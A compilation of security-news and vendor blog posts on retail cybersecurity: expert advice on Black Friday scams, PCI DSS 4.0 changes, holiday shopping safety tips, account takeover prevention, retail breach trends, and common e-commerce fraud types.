Category: Retail

This week marks Black Friday 2024! As the popularity of this event has skyrocketed in recent years, so have the cyber risks involved in buying and selling products. In the second of two articles, we have gathered some insights from cybersecurity experts who have their say on Black Friday, from the threats faced by consumers and vendors, to the best practices advised to stay safe.

Tim Ward, CEO and Co-Founder of ThinkCyber Security:

“Black Friday, Cyber Monday, and the holiday season are some of the busiest times of the year for online shoppers. Unfortunately, they’re also prime opportunities for cybercriminals to exploit consumers’ hasty shopping habits. With so much focus on finding the best deals, many shoppers are more vulnerable to scams, especially those disguised as unbeatable offers, unexpected refunds, or delivery notifications. 

Psychology plays a significant role in how scammers succeed. Our brains are wired to seek shortcuts and rely on heuristics—mental rules of thumb—to simplify decision-making. During the holiday season, we’re inundated with “amazing deals” and promises of massive savings. This constant exposure to offers can prime us to expect such opportunities everywhere, making us more likely to fall for scams. The mere-exposure effect, a principle of cognitive psychology, explains that the more familiar something feels, the more we trust it—regardless of its legitimacy. Scammers exploit this by crafting offers that appear increasingly credible with repeated exposure. 

Scarcity is another tactic commonly used by both legitimate marketers and cybercriminals during the holidays. Phrases like “Offer ends today,” “Limited stock,” or “Don’t miss out!” are designed to create urgency and push consumers into acting quickly. Scammers leverage this psychological pressure to lure victims into clicking on fraudulent links or sharing personal information. 

So, how can we help shoppers protect themselves from these risks? Education and awareness are key. For example, “re-priming” individuals by exposing them to examples of scams can make them more alert to offers that seem too good to be true. By bringing the possibility of a scam to the forefront of their minds—especially when interacting with emails or online offers—we can help them pause and evaluate the situation more critically. 

Another approach is to guide individuals from relying on intuitive, automatic decisions (System 1 thinking) to more deliberate, cautious decision-making (System 2). For instance, reminding users to verify unfamiliar senders or question urgent calls to action can encourage them to think twice before clicking. Additionally, providing examples of phishing emails that use scarcity tactics can empower individuals to recognise and report suspicious messages. 

Finally, it is crucial to foster an environment where people feel comfortable asking questions or reporting concerns. Real-time nudges—such as alerts for potentially risky emails—can further reinforce secure behaviours. By increasing familiarity with common scams and building awareness, we can empower consumers to shop confidently and safely during the holiday season.”

 

Darren Guccione, CEO and Co-Founder of Keeper Security

“Black Friday kicks off the holiday shopping season, with retailers competing for online customers by offering enticing discounts. However, behind these tempting deals and flashy banners, cyber threats may be lurking. The wide array of offers by online shopping platforms can also attract cybercriminals looking to hack accounts, steal banking information or trick shoppers into clicking on malicious links. As tempting as a deal may be, it’s crucial to follow some important security measures to ensure a great find doesn’t turn into a digital nightmare.

  • Choose Websites Carefully: With so many deals, it’s easy to click on the first link or the next ad seen on social media or your web browser. However, not all websites are equally secure. Stick to well-known retailers, research reputable brands and ensure that the URL starts with “https” to guarantee a minimum level of security.

 

  • Update Devices: Cyber attacks often exploit vulnerabilities in outdated systems and applications. Make sure your phone, computer and all applications are up-to-date before shopping online. With the latest versions of an operating system and antivirus programs, online security is strengthened.


  • Protect Passwords: Every online store requires its own account, but many people reuse the same passwords across different sites. This habit makes it easy for cybercriminals to infiltrate multiple accounts with one compromised credential. Use unique, complex passwords for each site, and, if possible, use a password manager to simplify management and enhance security.


  • Use Secure Payment Methods: Online shopping requires sharing financial information. Choose payment methods that offer security, like credit cards or secure payment services such as PayPal. To prevent card information from being easily accessible, don’t save it directly on websites or browsers, and never share your financial information via email or messaging – even in the retailer’s chatbot feature.


  • Be Cautious of Deals That Seem Too Good to Be True: Cybercriminals know how to leverage the excitement of the season by offering overly tempting deals. Be wary of unrealistic discounts or offers that pressure you with limited stock. If a website seems suspicious, verify the legitimacy of the offer through other channels before clicking on it.


  • Enable Anti-Phishing Warnings: High shopping seasons are ideal for phishing attempts. To avoid falling into these traps, learn to recognise suspicious emails. Grammar mistakes, poorly reproduced logos or strange links can be red flags. If you receive an offer by email, don’t click immediately – visit the official website through a search engine instead.


  • Avoid Public Wi-Fi: Free Wi-Fi is convenient but not secure. For safer shopping, use your home network or your mobile connection while you’re making purchases. Public networks could expose your sensitive data to hackers who monitor user traffic.”

 

Jasmine Eskenzi, Founder and CEO of The Zensory, says: 

“With Black Friday imminent, many of us may be planning to peruse the latest deals online. But with time pressures (one day only!) and emotive language (unmissable deals!) hidden within marketing materials and ‘across the whole site’, many of us may be put in a position where we feel pressured to make purchases that we may otherwise have not made. But why? And how can we make more conscious purchasing decisions this Black Friday and Cyber Monday?

The Psychology of Stress:

When we’re presented with ‘urgent’ decisions (like an ‘unmissable’ deal written in big red letters), our minds enter a state of stress. This leads us to something called ‘amygdala hijack’. Ultimately, the stress response ‘hijacks’ the area responsible for our fight, flight and freeze response (the amygdala). When our amygdala is activated, this leads to decreased activity to our prefrontal cortex, the part of our brain responsible for attention, memory and focus, located at the front of the brain. So this means, when we’re under high stress, we actually struggle to think clearly, retain information, and our impulse, inhibition and cognitive functions are decreased. These techniques are also often used by hackers to trick victims into giving away sensitive information. 

Tips:

  •         Take a breath: It sounds deceptively simple, but one way to get your brain out of ‘fight or flight’ mode is to take a deep breath. Breathe deeply into your belly and become mindful of your surroundings using your five senses (touch, sight, hear, smell or taste). This is a grounding exercise. 
  •         Be conscious of scams: In amongst the flashy deals will be cybercriminals looking to exploit unsuspecting victims. Phishing emails may look like they’re from a legitimate source, but they could be fake emails intending to steal credentials or money. Be mindful of the source an email comes from, hover over the email address, don’t click any links if you’re unsure of their legitimacy (search directly). 
  •         Ruminate on deals: Alongside taking breaths and practicing grounding exercises, remember that it’s okay to take a step back and revisit an offer later on, especially if it’s not something you were planning to buy (there’s always cyber monday, wink wink). By being more conscious about the things you’re buying, you save money and avoid making impulsive buys.”

 

Ben Hutchison, Associate Principal Security Consultant, Black Duck.

“Sadly, the old adage that ‘if it looks too good to be true, it usually is’, still holds true today, even during this time of year. Unfortunately, fantastic-sounding discounts that suddenly appear as emails, text messages, or ads while browsing may not be trustworthy and could compromise consumers’ details, devices, and information.

Consumers can minimise these risks by not replying to or clicking on any such offers, links, or adverts and should attempt to verify any deals by going to a more trustworthy source, such as the company’s website or store home page directly. Attackers may set up spoof versions of these legitimate websites, so users should always ask themselves if this is a domain/website address they recognise and not only rely on suggestions in search results. Users should also follow general cyber security hygiene techniques, such as ensuring their devices and browsers remain up to date. If in doubt about the legitimacy of a promotion, advert, or discount, users may want to consider contacting a sales or support representative via an alternative contact method obtained from a trusted location, or in the case of a local store/chain, users can physically visit the store and confirm if the promotions are legitimate.

Organizations can also take steps to mitigate such exploits from being successful if targeted against their employees/environment through defence in depth mechanisms and good security practices. These may include network segmentation, email security and scanning measures, link verification, DNS filtering, leveraging endpoint detection and response solutions, limiting code/file access and execution where practical.”

The post The Cybersecurity Risks of Black Friday 2024: What are the Experts Saying? Pt.2 appeared first on IT Security Guru.

This week marks Black Friday 2024! As the popularity of this event has skyrocketed in recent years, so have the cyber risks involved in buying and selling products. In the first of two articles, we have gathered some insights from cybersecurity experts who have their say on Black Friday, from the threats faced by consumers and vendors, to the best practices advised to stay safe.

Paul Bischoff, Consumer Privacy Advocate at Comparitech:

“Black Friday is one of the biggest shopping events of the year, offering consumers massive discounts and deals in stores and online. While it’s an excellent opportunity to snag bargains, it’s also a prime time for scammers to exploit eager shoppers. Identifying and avoiding these scams can save you from financial loss and keep your personal information secure.

Last year alone, consumers lost over $8.8 billion to online fraud, according to the Federal Trade Commission. Scam attempts always spike around Black Friday and Cyber Monday. But don’t worry – we’ll show you exactly how to spot these tricks and shop safely.

To protect yourself this Black Friday, you should be watching out for those too-good-to-be-true emails. For example, emails titled “90% OFF EVERYTHING!” from what looks like Amazon or Best Buy. The email appears perfect, down to the logo and formatting. But here’s the catch: clicking that “amazing deal” link could lead you to a fake website that steals your credit card information. In fact, according to Target’s security team, scammers frequently create fake Target websites during Black Friday, often using similar-looking domain names and copied logos to trick shoppers. The FTC reports that retail impersonation scams increase 75% during the holiday shopping season. Shoppers can protect themselves by following these steps:

  • Hover over (don’t click!) email links to preview the real URL
  • Look for spelling mistakes or unusual sender addresses (like amazon-deals@gmail.com)
  • Type the store’s web address directly into your browser instead of clicking email links

Consumers also need to watch out for social media shopping traps. Social media platforms are flooded with fake stores during Black Friday, and many disappear after collecting payments. A few warning signs to take into consideration are brand new accounts with no customer review, prices that seem impossibly low, poor-quality product photos and pressure tactics such as “Only 2 left!” or “Offer expires in 10 minutes!”.

Also, during Black Friday, scammers flood the market with discounted gift card offers that would race any bargain hunter’s heart. But here’s the harsh truth: according to the FBI’s Internet Crime Report, gift card scams cost Americans over $148 million last year alone. A few smart shopping tips for consumers are:

  • Only buy gift cards directly from authorized retailers
  • Never purchase “discounted” gift cards from individuals online
  • Check gift card balances immediately after purchase
  • Keep your receipt until you’re sure the card works
  • Never send gift cards in the mail”

 

Jamie Beckland, CPO at APIContext:

“With Black Friday just around the corner, e-commerce teams should be ready for anything. Load testing is common to ensure infrastructure can handle increased shopper traffic, but many overlook the threat of API misuse, which can open the door to bulk order abuse.

APIs run every part of the e-commerce stack, enabling seamless interactions between front-end systems, payment gateways, inventory management, and third-party integrations. However, poorly secured APIs can be exploited by malicious actors to execute bulk order scams—leveraging automation to exploit pricing errors, bypass purchase limits, or stockpile items meant for individual customers. These exploits are targeted and malicious, and often leverage the same APIs that power customer experiences.

To mitigate these risks, vendors should implement robust security measures such as rate limiting, authentication mechanisms like OAuth, and anomaly detection to identify unusual purchasing patterns. Regular audits and penetration testing can also help identify vulnerabilities before they’re exploited. By addressing API security proactively, businesses not only safeguard revenue but also ensure customer trust during the holiday rush. Black Friday should be a time for deals, not data breaches.”

 

Jamie Akhtar, Co-founder and CEO of CyberSmart:

“Black Friday offers bargains for savvy shoppers, but it also poses security risks for consumers and businesses alike. To illustrate what we mean, the UK alone saw losses exceeding £11.5 million due to online shopping scams between November 2023 and January 2024.

However, forewarned is forearmed, so here are some of cybercriminals’ top tactics for Black Friday scams.

Phishing Scams

While phishing scams are a year-round problem, the threat becomes particularly pronounced between Black Friday and Christmas. According to Bitdefender, 70% of Black Friday-themed spam emails in 2023 were identified as scams, revealing the scale of the problem. 

Worse still, cybercriminals are increasingly using AI tools to create and distribute these scams, making them harder to identify.

Fake websites
Cybercriminals create imitation websites that closely resemble legitimate retailers. These sites often advertise unbelievable deals through search engines to lure shoppers into entering personal and payment information, leading to identity theft or financial loss.

Gift card frauds

Fraudulent schemes involving gift cards are another common tactic. Essentially, scammers sell fake or drained gift cards for large online retailers to victims. 

Fake Order Confirmations
Scammers send emails or messages that mimic order confirmations for purchases that were never made. These communications often contain links to phishing sites or requests for personal or financial information.

Social Media Scams

We all remember the huge uptick in Facebook Messenger for Business scams during 2023 and cybercriminals use the same tactics to launch Black Friday scams. Scammers use social media to promote fake bargains or impersonate brands. Unfortunately, this usually pretty successful; fraud losses climb by around 20% in the festive shopping season. 

Delivery Scams
Scammers may send fake delivery notifications via email or text, prompting victims to provide personal information under the guise of confirming a delivery.

Transaction Failure Scams

Victims receive spam emails claiming that a recent transaction has failed, tricking them into providing sensitive information to resolve the issue.

Account Verification Scams
These scams involve messages asking users to verify their accounts due to suspicious activity, leading them to phishing sites designed to collect login credentials.

 

How to protect yourself/your business:

For consumers

  • Always verify the legitimacy of websites before making purchases
  • Be cautious of unsolicited emails and messages
  • Use secure payment methods like credit cards instead of wire transfers
  • Look for signs of counterfeit goods and check seller reviews

 

For businesses

  • Provide staff with training on the dangers of Black Friday shopping
  • Implement MFA across all company devices and applications (including personal devices being used for work)
  • Where possible, dissuade staff from using company devices for shopping
  • Put clear usage and security policies in place for employees
  • Mandate VPN use for all staff, particularly those working remotely.”

 

Andrew Bolster, Senior Manager, Research and Development, Black Duck.

“One thing consumers should be more vigilant for is ‘astroturfing’ product reviews and testimonials. In past years, we typically trusted the experience and advice of our neighbours and peers, and recommendations were worth their weight in gold, but in the world of online retailing in the context of modern Large Language Models, shoppers need to be aware of retailers or suppliers using AI generated synthetic reviews of their own products to drive sales. Shoppers should always take online reviews cautiously and with a grain of salt, and where possible, seek and share recommendations among friends and family.”

Thomas Richards, Principal Security Consultant, Black Duck.

“Consumers should be extra diligent this shopping season as we approach Black Friday and the holiday rush.  With the number of breaches this year, a lot of consumer data is in the hands of malicious actors who can use it to craft very convincing messages via email and text.  Consumers should be cautious when clicking links to emails that sound too good to be true.  Yes, some holiday deals are very good, but that does not mean they all are.  Always check the sending email address to be sure it matches the website of the company it is purporting to be from.  If you receive an email from an online store that you don’t recognise offers amazing deals on hard-to-get items, it’s probably a scam.  The best deals will mostly happen from established retailers or the company themselves.”

The post The Cybersecurity Risks of Black Friday 2024: What are the Experts Saying? appeared first on IT Security Guru.

Selling miniature replicas to unsuspecting shoppers:

Online marketplaces sell tiny pink cowboy hats. They also sell miniature pencil sharpeners, palm-size kitchen utensils, scaled-down books and camping chairs so small they evoke the Stonehenge scene in “This Is Spinal Tap.” Many of the minuscule objects aren’t clearly advertised.

[…]

But there is no doubt some online sellers deliberately trick customers into buying smaller and often cheaper-to-produce items, Witcher said. Common tactics include displaying products against a white background rather than in room sets or on models, or photographing items with a perspective that makes them appear bigger than they really are. Dimensions can be hidden deep in the product description, or not included at all.

In those instances, the duped consumer “may say, well, it’s only $1, $2, maybe $3­—what’s the harm?” Witcher said. When the item arrives the shopper may be confused, amused or frustrated, but unlikely to complain or demand a refund.

“When you aggregate that to these companies who are selling hundreds of thousands, maybe millions of these items over time, that adds up to a nice chunk of change,” Witcher said. “It’s finding a loophole in how society works and making money off of it.”

Defrauding a lot of people out of a small amount each can be a very successful way of making money.

By Tyler Reguly, senior manager, security R&D at cybersecurity software and services provider Fortra

The pandemic ushered in an unprecedented wave of online purchasing, as people around the world became far more comfortable with virtual shopping. In fact, the U.S. Census Bureau’s latest Annual Retail Trade Survey reports e-commerce expenditures rose from $571.2 billion in 2019 to $815.4 billion in 2020, a 43% increase.

Cybercriminals everywhere matched the uptick with clever new schemes to filch payment card data and defraud victims of billions of dollars. The Nilson Report estimated $28.6 billion in payment card-related losses occurred in 2020 (over one-third of them in the U.S.). They also predict this number will reach $408 billion in losses by 2030.

Time for change

With the boom in digital commerce paired with the increased popularity of contactless payment and cloud-stored accountholder data, the Payment Card Industry (PCI) Security Standards Council decided to re-evaluate the existing standard. First launched in 2004 and updated most recently in 2018, the PCI Data Security (PCI DSS) standard is continually updated to reflect the evolving challenges of the cyberthreat landscape.

The current version, PCI DSS v3.2.1, is clearly failing to protect cardholder account details effectively in today’s environment. The Council gathered input from 200+ organizations and announced the updated requirements in March 2022, which will become mandatory on March 31, 2024. Organizations also have until 2025 to implement a set of future-dated changes. The full timeline can be found on the PCI Security Council website.

The 12 controls

PCI DSS 4.0 spans 12 controls, several of which have received updates in the latest version. According to the PCI Council, the enhanced requirements promote security as a continuous process while adding flexibility for different methodologies.

  1. Install and maintain network security controls
  2. Apply secure configurations to all system components
  3. Protect stored account data
  4. Protect cardholder data with strong cryptography during transmission over open, public networks
  5. Protect all systems and networks from malicious software
  6. Develop and maintain secure systems and software
  7. Restrict access to cardholder data by business need-to-know
  8. Identify users and authenticate access to system components
  9. Restrict physical access to cardholder data
  10. Log and monitor all access to system components and cardholder data
  11. Test security of systems and networks regularly
  12. Support information security within organizational policies and programs

Changes in PCI DSS 4.0

In looking at the new standard more closely, there are several requirements with notable changes. Below is a high-level overview of the differences between PCI v3.2.1 and PCI v4.0:

Requirement 2: Broader scope defining the need for security configuration management (SCM) on more types of assets.

Requirement 3: “Account Data” instead of “Cardholder Data” indicates a potential increase of scope for PCI assets.

Requirement 4: Less specificity on the type of encryption used means your organization is freer to follow industry best practices. An important takeaway is to internally define what those technical standards are and be able to justify why they are now “Strong Cryptography” so that you can still pass your PCI audit (essentially, just document what standards you are following and why).

Requirement 5: It is no longer sufficient to just have standard antivirus software. This requirement now specifically calls for anti-malware to be in place, necessitating a strong antivirus solution with malware protection or EDR/MDR/XDR solution.

Requirements 7–9: These requirements are primarily the same as before, but the big takeaway is that instead of just enforcing access controls to systems, it’s now requesting this to be done more granularly to specific components such as software, databases, etc.

Your five-step PCI DSS 4.0 transition checklist 

As you get up to speed on how the standard itself has evolved, you’ll begin to understand the potential impact to your own processes and operations. This isn’t a one-and-done type of effort. It will require a phased approach over time. Successful organizations will view the new requirements as an opportunity to strengthen the security mindset across many aspects of their business.

To help you get started, you’ll want to build the following components into your initiative:

  1. Plan a phased implementation according to the PCI timeline
  2. Review potential changes to scope
  3. Conduct a people and process evaluation
  4. Strengthen security configuration management (SCM) processes
  5. Onboard a tool that automates continuous compliance

Go in-depth on how to approach each of these items in this executive guide, the Five-Step PCI DSS v4.0  Transition Checklist. This essential resource helps you understand the requirements of PCI DSS 4.0 and how to ensure your organization is addressing the changes needed to avoid audit fines and data breaches.

Above all, securing payment card information helps protect your customers’ sensitive information and your company’s reputation by preventing costly business disruption in a fast-changing cyberattack environment.

Tyler Reguly is senior manager, security R&D at cybersecurity software and services provider Fortra, responsible for overseeing TACTIC, a team of security researchers that provide the security expertise that powers the company’s Tripwire product line.

In addition to security research, Tyler has worked closely with Fanshawe College, from which he graduated with a diploma in Computer Systems Technology, developing five courses including subjects like Advanced Hacker Techniques & Tactics, Hacking and Exploits, Malware Research, Evolving Technologies and Threats, and Python Programming.

Tyler has contributed to various standards over the years including CVSSv3 and has provided technical editing to a number of published books. In addition, he is a co-founder of the IoT Hack Lab that has been offered at SecTor (Security Education Conference Toronto) since 2015.

Follow Tyler Reguly on Twitter.

The post The Five-Step PCI DSS 4.0 Transition Checklist appeared first on Cybersecurity Insiders.

By Gal Ringel, Co-Founder & CEO of Mine Privacy Ops

If you’re busy planning your holiday shopping this month, you’re not alone. Q4 is always the busiest time of year for shoppers and retailers, chock-full of shopping celebrations like Singles’ Day, Black Friday, and Cyber Monday, among others. In 2021, online holiday sales reached $211.41 billion, and this year, shoppers are predicted to spend $209.7 billion, a 2.5% YoY growth for the holiday season.

Is Online Shopping Safe?

As Covid pushed the pendulum ever closer to ecommerce supremacy, more people are shopping online in 2022 than ever before, with the usual holiday spike already upon us. That means more people unaware of the risks online shopping presents (other than overspending).

The holiday shopping season brings with it many e-commerce scams and setups aimed at both consumers and companies, including data breaches, counterfeit scammers selling fake goods, and fake phishing pages designed to steal people’s personal and financial details for  monetary exploitation and identity theft.

Businesses have been quick to ramp up websites to match consumer shopping trends, but cybersecurity measures are lagging behind. That makes this holiday shopping season particularly precarious for consumers, who should keep these tips in mind to safeguard their data as they browse gifts for their loved ones.

Naughty or Nice: Online Shopping Safety Tips

Despite the above warning, there’s no reason to limit your online experiences, and we encourage you to continue your holiday shopping as planned, although you should pay extra attention to specific elements.

  1. Buy from websites you know and trust: Scammers like to set up fake websites that resemble familiar brands. These websites are likely to appear after the first few pages of an online search, but not always. By visiting a page you know and have shopped at before, you are less likely to buy fake goods or give your payment details to the wrong people.
  2. Type in the URL: If you get a tempting offer via email or text, search for the brand’s website and make sure the offer is actually there. There’s no reason to click unfamiliar links that could scam or phish you. Pay close attention to URL spelling errors in any links sent to you, and remember that serious brands are far less likely to operate websites with an ending other than .com.
  3. Seek the lock: The padlock icon you see on every major website isn’t just a decoration. It representsSSL (Secure Sockets Layer) encryption protecting shopping websites. If you don’t see this icon and the URL doesn’t begin with HTTPS—you should think twice before giving away your payment details. HTTPS is the secure and updated version of HTTP, so make sure a site starts with that too before you buy.
  4. Use strong passwords: It’s 2022, and 50% of users still use passwords like “1234” and “password.” 51% use the same password for multiple accounts, risking a significant data loss if one is revealed. Sure, remembering all those crazy combinations may be challenging, but it also makes it challenging for hackers to access your bank account or steal your identity. Whenever possible, choose two-step authentication and pay using an online payment system like PayPal, which encrypts your payment information.
  5. Read reviews: Before making a purchase, read a few reviews and see if the site seems legit. Can scammers fake reviews? Sure, but it’s more of an effort. Reviews are a part of the overall trustworthiness of the shopping experience, so consider them another step in your evidence-gathering process.
  6. Don’t be gullible: Brilliant deals are always exciting, but double-check everything on the website. If something sounds unreasonably generous Don’t be tempted to save money if it might cost you a lot more–especially if one of the above security concerns is present on the site.
  7. Only provide necessary details: If a website asks for personal information that doesn’t feel relevant, runaway. This may be scammers attempting to commit identity theft disguised as a legitimate shopping experience. Generally speaking, you should apply this approach to any website you visit and refrain from sharing information without getting reasonable value in return.

Done Shopping? Don’t Forget to Clean Your Footprint

Our eighth and final tip is actually for after the shopping ends.

If you feel like you’ve given too many online services your personal and payment data (which is probably the case for most of us, with the average person’s digital footprint at roughly 350 companies), there’s a way to regain control. Mine allows you to own your personal information without limiting your online experiences, all for free.

The quick and free process will reveal every service that has collected your data in the past, after which you can take back your data from any service that you don’t use or don’t feel comfortable with having your data on record.

So once you’re done buying gifts for loved ones, give yourself the greatest gift of all and minimize your digital footprint and online exposure.

The post Safe Sales: 8 Tips for Keeping Your Data Safe & Secure This Holiday Shopping Season appeared first on Cybersecurity Insiders.

By Doriel Abrahams, Head of U.S. Analytics, Forter

Account takeover (ATO) fraud is a rapidly growing and costly challenge for businesses. In fact, it’s expected to surpass malware as the top cybersecurity concern in the not-too-distant future.

The COVID-19 pandemic certainly added fuel to the fire, as droves of consumers suddenly came online to create new accounts with stores and apps they had never visited before. Some of those customer accounts have since gone dormant, while many others remain inadequately protected due to weak passwords or the absence of safeguards like multi-factor authentication (MFA).

In working with many global brands over the years, I’ve been able to follow the ever-evolving trends in both customer behavior and fraud attack methods. What’s interesting to see is how ATO is playing out across the different industries and geographies – and more importantly, how businesses are responding.

Evolution of ATO

A decade ago, fraud prevention was largely focused on chargebacks and online checkout. But as merchants got better at protecting checkout, fraudsters got more creative with ways to attack. They’re no longer targeting just checkout, but the entire digital customer journey, of which ATO is a large part.

Fraudsters like going after online accounts for the same reasons customers open them: they make it easy to do business with merchants, whether it’s to purchase a product, cash in loyalty points or take advantage of a promotion. Consumers enjoy convenience and discounts. For fraudsters, it’s like walking into a candy store as a legitimate-looking customer with a sweet array of options to do damage.

The bad news is only getting worse for retailers, as fraudsters grow bolder and go after more valuable items than ever before. Across Forter’s own network, we’ve seen the average order value of items in ATO attacks increase by 51% in the past year.

Shifting Trends = New Opportunities

Always looking to exploit emerging trends, fraudsters are adept at tracking changes in the market. Attacks are up across many verticals, including digital goods, travel and cryptocurrency. And while all industries are ripe targets for ATO fraud, some are more attractive than others.

For example, the beauty industry has seen ATO attacks increase by 94%. Beauty and cosmetics has traditionally been a high-touch, in-person experience where customers often want to test the products before purchasing them and consult with a store associate on colors, scents and application techniques. This model isn’t going away, but more transactions have shifted from in store to online over the last few years.

One explanation for the continued growth in beauty e-commerce is the exclusivity and special offers associated with online accounts. Beauty brands have long been masters at inspiring loyalty and enthusiasm for their products. Their carefully curated programs are successful at winning and keeping customers, but also open the door to new opportunities for fraudsters.

Beauty isn’t the only industry that fraudsters have followed with a keen eye. Online apparel also continues to grow with some brands even integrating app-based purchase and interaction capabilities into their physical stores. It’s no surprise that ATO fraud against apparel companies has increased by 28% compared to 2021.

Proven Prevention Strategies

As criminals become more sophisticated, their fraud tactics are also evolving. So what can you do to protect your company from ATO without sacrificing the customer experience?

Every business has its own unique set of challenges, but here are three strategies that are widely effective at stopping ATO attacks in their tracks:

1. Stop ATO up front. Don’t wait until checkout to put up your defenses. Start right out of the gate by protecting the sign-up and login process. Putting in safeguards at the first point of entry helps dramatically ease the burden at checkout. We’ve consistently seen about a 35% reduction in ATO at checkout among merchants that add login protection.

2. Block bot attacks. Bots are everywhere, wreaking havoc at account creation, checkout and points in between. Because bots are designed to work at scale, once they break through, they keep going forever. But if you show bots that they’re not going to get in, they’ll simply move on. When you can identify and block bad bots successfully, ATO attempts will go down.

3. Use friction judiciously. All friction is not created equal, and applying friction only where it’s appropriate – usually at login – gives a customer a chance to prove themselves and ensures you’re not letting in the wrong person. For instance, implementing multi-factor authentication (MFA) has proven to be highly effective for our merchants. Some two-thirds of MFA challenges failed, confirming the block was in the right place, and the remaining third was able to continue their journey without further hiccups.

With strong and ongoing growth in e-commerce, ATO fraud will remain a huge risk for online merchants. The good news is there are many ways you can protect your business – and your customers – at every critical point along the digital journey.

The post Three Ways to Stop ATO Attacks in Their Tracks appeared first on Cybersecurity Insiders.

By Rafael Lourenco, EVP & Partner, ClearSale

Cybersecurity attacks against businesses are unrelenting, and while retail and ecommerce typically focus on fraud prevention, they’re often targets of other digital attacks as well. For example, the 2022 Verizon Data Breach Investigations Report (DBIR) documented 241 confirmed retail data breaches in 2021, resulting in stolen credentials, personal information, and payment data. At the same time, 56% of Merchant Resource Council members reported phishing attacks in 2022, which can lead to data theft, malware attacks, and fraud.

These cybercrimes have costly consequences for businesses. The average cost of a data breach worldwide in 2022 is $4.35 million, a figure that could easily put a smaller retailer out of business and create budgetary problems for a larger retailer. These numbers show why it’s so important for ecommerce businesses and retailers to maintain a culture of security that includes — but also goes beyond — fraud prevention.

A focus on security is important for retailers of all sizes, even small ones. It’s always been clear that fraudsters and criminals prefer to target businesses that they suspect have weak or outdated security, which usually means smaller businesses that lack the resources to have a large in-house security team. For example, the DBIR found that of 620 documented incidents against retailers, 157 targeted companies with fewer than 1,000 employees, compared to 68 incidents aimed at retailers with more than 1,000 employees (the size of the other 404 companies wasn’t known).

Among confirmed breaches at retailers whose size was known, 54 companies had less than 1,000 employees, compared to 35 larger companies. Smaller retailers, therefore, can’t assume that their size or lower profile compared to major retailers will protect them. There is no “security through obscurity” for B2C companies.

Common cybersecurity attacks on retailers

The DBIR lists system intrusion, social engineering, and web app attacks as the most common attack patterns involved in retail data breaches in 2021. Once attackers made it into their victims’ systems, their most common actions were hacking and launching malware — especially malware designed to scrape payment data from web apps. This kind of attack can lead to costly brand damage and loss of customer trust. 84% of online shoppers in 5 countries surveyed by ClearSale in March 2021 said they would never shop again with a website that allowed a fraudster to use their credit card information.

Data-scraping malware can be avoided with continuous website scanning and security to prevent installation of malicious code and to remove any malware as soon as it’s detected. Malware prevention also relies on employees who are educated about email threats and how to avoid them.

Provide security awareness training for retail employees

Social engineering attacks can take many forms, including multiple varieties of phishing. One common mode of attack is to impersonate a professional service that many businesses rely on, like Microsoft, Gmail, or a shipping company. The attackers send emails that include the company logo, a display name that appears to come from the real company, and a request to log in for a policy update, password change, or some other “critical” task. Then they steal the credentials to commit fraud, spread malware, or steal protected information.

Encourage your employees to report any suspicious emails to your security team before they click on any links or open any attachments. When your security analysts find phishing emails, they can save them to use in training so that your employees can see exactly what to look out for and what types of attacks are trending now.

Review your access control management policies and practices

The pandemic pushed many retailers to a work-from-home model for some or all of their employees. The result is that people may be accessing company systems from a variety of devices, over many different networks. This approach can increase the risk that an attacker — perhaps someone who launched a successful phishing attack or who intercepted a communication over a public Wi-Fi network — can access those company systems and move between them causing damage and stealing data.

If your company has policies on what types of devices and networks employees can use to log in to work, it might be worth reviewing them to see if they need updating. If your business has no such policy, it’s time to start creating one. Ideally, your employees would only use company-issued devices and log in over a company VPN. At a minimum, they should avoid working over unsecure Wi-Fi networks and make sure their home router’s default password has been changed.

Your company’s IT person or team can also review who has access to each of your company’s systems and then set appropriate controls based on job role or department. For example, your warehouse team does not need access to your company’s financial database, and your entry-level employees don’t need access to your executive team’s files. Setting these controls and removing employee’s access completely when they leave the company can prevent intrusions from spreading and avoid internal breaches.

It’s also wise to periodically review the settings on all your company’s software, operating systems, cloud storage, and hardware to ensure that access is private and limited to the employees who are authorized to use it. More than 10% of 2021 breaches were caused by errors including misconfigured cloud storage, per the DBIR.

Preventing attacks that can lead to data breaches, fraud, and brand damage requires an ongoing commitment to thinking about security and talking about it with your employees. While retailers are rightly concerned with preventing transaction fraud, it’s important to build and maintain a company culture focused on the full range of security awareness and best practices.

The post Cybersecurity Retail Risk Trends to Watch Now and in 2023 appeared first on Cybersecurity Insiders.

By: Oksana Balytsky, director of product marketing, Forter

E-commerce is expected to account for nearly a quarter (22%) of all retail sales by 2023 — a 7.9% jump from 2019.

As consumers fully embrace the digital age, e-commerce is expected to thrive and is likely to become the primary method of purchasing. By 2024, global e-commerce sales are expected to reach $6 trillion.

While the increase in e-commerce transactions is great for retailers, it also brings about another problem: e-commerce fraud.

Why Retailers Need to Be on the Lookout for Fraud

E-commerce fraud seems fairly self-explanatory, but the reality is it covers a wide range of tactics used by fraudsters to target retailers. While brick-and-mortar stores are no strangers to scams, having policies in place to check for counterfeit bills and credit card fraud, e-commerce platforms aren’t as seasoned and have a whole new world of opportunities for bad actors to take advantage of.

Rewards, saved payment information and other convenient offerings may entice eager shoppers to give a certain retailer their business, but are avenues for fraudsters to take advantage of, should they gain access to legitimate customers’ account information.

With rising e-commerce transactions and retailers enhancing the digital experience to attract consumers, there are five common types of fraud that merchants should be on the lookout for:

  • Account Takeover

  • Card Testing

  • Interception

  • Chargebacks

  • Refund Fraud

Account Takeover Fraud

Hollywood has dramatized hackers. The common perception is that these cybercriminals are penetrating firewalls with lines of code and using complicated tactics to outsmart top-tier security products.

The reality? Most are just logging in.

Known as account takeover (ATO), this fraud tactic involves when scammers gain access to a legitimate customer’s login. Fraudsters have a variety of methods they can use to crack a password, such as purchasing stolen passwords and security codes from the Dark Web, implementing phishing schemes or just good ole’ fashion guessing.

Once ATO occurs, the scammer can change account details, make purchases, access other accounts if on an admin user and withdraw funds if the application allows it.

ATO is a form of identity theft, and victims may never trust the retailer again.

Card Testing Fraud

In addition to credentials, fraudsters can also purchase credit card numbers in bulk from the Dark Web for as low as $17. Scammers can also just steal them directly through phishing attacks.

To avoid initial suspicion, fraudsters will typically start out with smaller transactions with each card number to figure out which ones are valid and determine the limits. If successful, then scammers begin making larger purchases. By the time the merchants discover they’ve been the target of card testing, the scammer has already likely done significant damage.

Interception Fraud

Interception fraud is when an individual purchases an item online with a stolen payment method but provides the retailer with legitimate, matching shipping and billing addresses. The goal is to intercept the package before it gets to the address provided.

There are three ways this happens:

  1. The scammer knows the victim and is in close enough proximity to steal the package from the drop-off location.

  2. Contacting a customer service representative from a retailer to change the address before the item is ready to be shipped.

  3. Touching base with the actual shipping company to reroute the package to another destination of the fraudster’s choice.
